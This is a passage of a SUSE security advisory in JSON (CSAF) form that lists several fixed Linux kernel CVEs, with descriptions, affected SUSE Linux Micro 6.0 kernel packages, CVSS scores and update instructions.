"text": "https://www.suse.com/security/cve/CVE-2025-68217"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: pegasus-notetaker - fix potential out-of-bounds access\n\nIn the pegasus_notetaker driver, the pegasus_probe() function allocates\nthe URB transfer buffer using the wMaxPacketSize value from\nthe endpoint descriptor. An attacker can use a malicious USB descriptor\nto force the allocation of a very small buffer.\n\nSubsequently, if the device sends an interrupt packet with a specific\npattern (e.g., where the first byte is 0x80 or 0x42),\nthe pegasus_parse_packet() function parses the packet without checking\nthe allocated buffer size. This leads to an out-of-bounds memory access.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68217",
"url": "https://www.suse.com/security/cve/CVE-2025-68217"
},
{
"category": "external",
"summary": "SUSE Bug 1255221 for CVE-2025-68217",
"url": "https://bugzilla.suse.com/1255221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68217"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68222",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68222"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: s32cc: fix uninitialized memory in s32_pinctrl_desc\n\ns32_pinctrl_desc is allocated with devm_kmalloc(), but not all of its\nfields are initialized. Notably, num_custom_params is used in\npinconf_generic_parse_dt_config(), resulting in intermittent allocation\nerrors, such as the following splat when probing i2c-imx:\n\n WARNING: CPU: 0 PID: 176 at mm/page_alloc.c:4795 __alloc_pages_noprof+0x290/0x300\n [...]\n Hardware name: NXP S32G3 Reference Design Board 3 (S32G-VNP-RDB3) (DT)\n [...]\n Call trace:\n __alloc_pages_noprof+0x290/0x300 (P)\n ___kmalloc_large_node+0x84/0x168\n __kmalloc_large_node_noprof+0x34/0x120\n __kmalloc_noprof+0x2ac/0x378\n pinconf_generic_parse_dt_config+0x68/0x1a0\n s32_dt_node_to_map+0x104/0x248\n dt_to_map_one_config+0x154/0x1d8\n pinctrl_dt_to_map+0x12c/0x280\n create_pinctrl+0x6c/0x270\n pinctrl_get+0xc0/0x170\n devm_pinctrl_get+0x50/0xa0\n pinctrl_bind_pins+0x60/0x2a0\n really_probe+0x60/0x3a0\n [...]\n __platform_driver_register+0x2c/0x40\n i2c_adap_imx_init+0x28/0xff8 [i2c_imx]\n [...]\n\nThis results in later parse failures that can cause issues in dependent\ndrivers:\n\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property\n [...]\n pca953x 0-0022: failed writing register: -6\n i2c i2c-0: IMX I2C adapter registered\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property\n i2c i2c-1: IMX I2C adapter registered\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property\n s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property\n i2c i2c-2: IMX I2C adapter registered\n\nFix this by initializing s32_pinctrl_desc with devm_kzalloc() instead of\ndevm_kmalloc() in s32_pinctrl_probe(), which sets the previously\nuninitialized fields to zero.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68222",
"url": "https://www.suse.com/security/cve/CVE-2025-68222"
},
{
"category": "external",
"summary": "SUSE Bug 1255218 for CVE-2025-68222",
"url": "https://bugzilla.suse.com/1255218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68222"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68230",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68230"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix gpu page fault after hibernation on PF passthrough\n\nOn PF passthrough environment, after hibernate and then resume, coralgemm\nwill cause gpu page fault.\n\nMode1 reset happens during hibernate, but partition mode is not restored\non resume, register mmCP_HYP_XCP_CTL and mmCP_PSP_XCP_CTL is not right\nafter resume. When CP access the MQD BO, wrong stride size is used,\nthis will cause out of bound access on the MQD BO, resulting page fault.\n\nThe fix is to ensure gfx_v9_4_3_switch_compute_partition() is called\nwhen resume from a hibernation.\nKFD resume is called separately during a reset recovery or resume from\nsuspend sequence. Hence it\u0027s not required to be called as part of\npartition switch.\n\n(cherry picked from commit 5d1b32cfe4a676fe552416cb5ae847b215463a1a)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68230",
"url": "https://www.suse.com/security/cve/CVE-2025-68230"
},
{
"category": "external",
"summary": "SUSE Bug 1255134 for CVE-2025-68230",
"url": "https://bugzilla.suse.com/1255134"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68230"
},
{
"cve": "CVE-2025-68233",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68233"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: Add call to put_pid()\n\nAdd a call to put_pid() corresponding to get_task_pid().\nhost1x_memory_context_alloc() does not take ownership of the PID so we\nneed to free it here to avoid leaking.\n\n[mperttunen@nvidia.com: reword commit message]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68233",
"url": "https://www.suse.com/security/cve/CVE-2025-68233"
},
{
"category": "external",
"summary": "SUSE Bug 1255206 for CVE-2025-68233",
"url": "https://bugzilla.suse.com/1255206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68233"
},
{
"cve": "CVE-2025-68235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnouveau/firmware: Add missing kfree() of nvkm_falcon_fw::boot\n\nnvkm_falcon_fw::boot is allocated, but no one frees it. This causes a\nkmemleak warning.\n\nMake sure this data is deallocated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
